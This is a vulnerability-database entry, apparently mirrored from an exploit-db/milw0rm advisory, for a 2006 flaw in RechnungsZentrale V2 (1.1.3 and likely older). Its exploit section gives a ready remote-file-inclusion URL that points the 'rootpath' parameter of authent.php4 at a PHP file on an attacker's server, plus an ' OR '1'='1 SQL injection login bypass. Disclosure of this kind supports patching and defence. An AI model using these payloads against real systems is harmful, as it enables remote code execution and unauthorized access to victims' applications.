RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055684 漏洞类型
发布时间 2006-04-19 更新时间 2006-04-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1699
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
- GroundZero Security Research and Software Development 2006                     -

   Software:   RechnungsZentrale V2
   Version:    1.1.3, likely older versions are affected aswell.
   Vendor:     http://www.nfec.de/
   
   Remote Inclusion:
       http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4
   
   SQL Injection:
       User: ' OR '1'='1
       Password: 1   
   
- Bugs discovered by GroundZero Security Research and Software Development       -
- http://www.GroundZero-Security.com | Http://www.g-0.org                        -

# milw0rm.com [2006-04-19]